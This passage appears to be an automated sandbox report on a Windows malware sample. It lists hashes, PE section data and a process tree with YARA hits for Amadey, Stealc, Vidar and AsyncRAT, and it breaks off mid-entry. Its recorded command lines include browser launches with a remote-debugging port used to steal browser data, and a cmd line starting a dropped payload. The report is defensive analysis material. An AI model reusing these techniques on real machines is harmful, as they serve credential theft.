
\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\1023280001\dea82620d5.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.906890595608518
Encrypted:	false
SSDEEP:	3:SXhRi75n:SC5
MD5:	3A33AF4BC7DC9699EE324B91553C2B46
SHA1:	4CCE2BF1011CA006FAAB23506A349173ACC40434
SHA-256:	226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
SHA-512:	960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
Malicious:	false
Preview:	1.29548Enjoy!..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947011008417305
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	i8Vwc7iOaG.exe
File size:	1'841'664 bytes
MD5:	646b8b4f1120776d924259da33f0e73d
SHA1:	db1fc3f2de367def833b34dfc6228ea3e185815d
SHA256:	bcaff60055929f46412dd46cfe9f59413be788904cb1d55f794ecb5ef0409cba
SHA512:	762b7dd5102972a58a54b8a9b818bdccc405ea05c6d3e35a9c2387e52c13b954bbb5df37de31fbea3877e57f0a75965818932619c03ebc8693af0eecc65b5744
SSDEEP:	49152:J6seTDSido6vMuVPisYo80uYZPmsCEJyY6oXr6AxBE:J6suK/psPfcg1XGAxB
TLSH:	DE85336ACBF280E8CF13C47CEBB25B107A16BE6A05C5FD71259255D312335AA92DBDC0
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................H...........@...........................H.....v.....@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x888000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FC7506D74FAh
psubb mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
inc dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x53000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	29df7f1d29378dcb72976fd3851be75d	False	0.9996361825980392	data	7.985609217833421	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1ac	0x200	c4249243ceaeb236e3ce8ce2ab2c9a69	False	0.5390625	data	5.249019796122045	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x55000	0x29a000	0x200	496ee1fbbe9e454caef60eef8ad1f4d7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
niowkeag	0x2ef000	0x198000	0x197800	7f9c4f09d106c0497dfc743570e7645f	False	0.9943491180981595	data	7.952683580033328	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uicdnwsx	0x487000	0x1000	0x600	3fd72b1bf6c1de6e5f2b4c676a63a5eb	False	0.560546875	data	4.958524822253835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x488000	0x3000	0x2200	c0addbf1ffb85b8238f0ab603c190907	False	0.05997242647058824	DOS executable (COM)	0.8016631097827285	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x53058	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Target ID:	0
Start time:	06:37:01
Start date:	26/12/2024
Path:	C:\Users\user\Desktop\i8Vwc7iOaG.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\i8Vwc7iOaG.exe"
Imagebase:	0x920000
File size:	1'841'664 bytes
MD5 hash:	646B8B4F1120776D924259DA33F0E73D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2205307367.0000000001258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:37:42
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Y71AV1VIPLT8Y663WBDXSB.exe"
Imagebase:	0xc40000
File size:	5'169'664 bytes
MD5 hash:	97B80E7A522A3D40515E954A1FB4B428
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.3141398938.0000000000C41000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.3147595579.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:37:48
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\4XVI62Q28CHMU2Y2V4F8.exe"
Imagebase:	0x980000
File size:	3'243'008 bytes
MD5 hash:	D297F9F22080C6F66B4E9C9156A6FF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2590347965.0000000000981000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:37:51
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xe40000
File size:	3'243'008 bytes
MD5 hash:	D297F9F22080C6F66B4E9C9156A6FF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2617283452.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:37:51
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xe40000
File size:	3'243'008 bytes
MD5 hash:	D297F9F22080C6F66B4E9C9156A6FF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2632687565.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:37:56
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:37:56
Start date:	26/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2228,i,8136523898456427104,7665852978689439012,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:38:00
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xe40000
File size:	3'243'008 bytes
MD5 hash:	D297F9F22080C6F66B4E9C9156A6FF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000003.3567702687.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.4738635134.0000000000E41000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000003.4044838292.00000000009C1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000003.3567876163.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000003.3761299972.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000003.3763224367.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000003.4048760844.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.4677077995.0000000000976000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:38:07
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:38:07
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2320,i,1031345555997666430,10718117645205196851,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:38:07
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:38:08
Start date:	26/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2156,i,5924171307802308355,13016151370304266811,262144 /prefetch:3
Imagebase:	0x7ff6c1cf0000
File size:	4'210'216 bytes
MD5 hash:	69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	06:38:46
Start date:	26/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\FIJECAEHJJ.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:38:46
Start date:	26/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:38:46
Start date:	26/12/2024
Path:	C:\Users\user\Documents\FIJECAEHJJ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Documents\FIJECAEHJJ.exe"
Imagebase:	0x7b0000
File size:	3'243'008 bytes
MD5 hash:	D297F9F22080C6F66B4E9C9156A6FF86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000013.00000002.3165891597.00000000007B1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:38:49
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1022088001\52ba7a538c.exe"
Imagebase:	0xf00000
File size:	22'156'802 bytes
MD5 hash:	6D6BBF1E873FB791141EA7FE2C166DCF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Source: 00000014.00000002.3410807562.0000000001E32000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Source: 00000014.00000002.3410807562.0000000001E58000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000014.00000002.3410807562.0000000001F4C000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Source: 00000014.00000002.3410807562.0000000001E0C000.00000004.00001000.00020000.00000000.sdmp, Author: Sekoia.io
Antivirus matches:	Detection: 48%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:38:58
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1022129001\5fe60d6c80.exe"
Imagebase:	0xf70000
File size:	1'901'056 bytes
MD5 hash:	3FA3842503DB7F65438CDDE8B7A7DD0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000003.3246634684.0000000004980000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.3287892835.0000000000F71000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:39:00
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0xe30000
File size:	1'901'056 bytes
MD5 hash:	3FA3842503DB7F65438CDDE8B7A7DD0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000003.3279869843.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.3320866189.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:39:01
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0xe30000
File size:	1'901'056 bytes
MD5 hash:	3FA3842503DB7F65438CDDE8B7A7DD0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000003.3280907715.0000000005230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.3321333193.0000000000E31000.00000040.00000001.01000000.00000013.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:39:10
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1022472001\ukX1YE2.exe"
Imagebase:	0x7ff7c81a0000
File size:	2'282'496 bytes
MD5 hash:	71B104246AC3F43D058E7C67E8B07DEF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 57%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	06:39:10
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\soonmaintain.exe
Imagebase:	0x1c593ed0000
File size:	1'645'056 bytes
MD5 hash:	92A9F111C456947F39B59EB9F13E4BF6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.3734030557.000001C595C74000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000019.00000002.3784671857.000001C5AE540000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.3783415700.000001C5AE46E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.3734030557.000001C59617A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	06:39:14
Start date:	26/12/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0xa90000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: HiddenCobra_BANKSHOT_Gen, Description: Detects Hidden Cobra BANKSHOT trojan, Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth Rule: infostealer_win_vidar_strings_nov23, Description: Finds Vidar samples based on the specific strings, Source: 0000001A.00000002.4620113858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Sekoia.io
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	06:39:19
Start date:	26/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1022773001\k0ukcEH.exe"
Imagebase:	0x9d0000
File size:	1'885'696 bytes
MD5 hash:	4EAE4944D789D3440760E32531707AD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	06:39:21
Start date:	26/12/2024
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
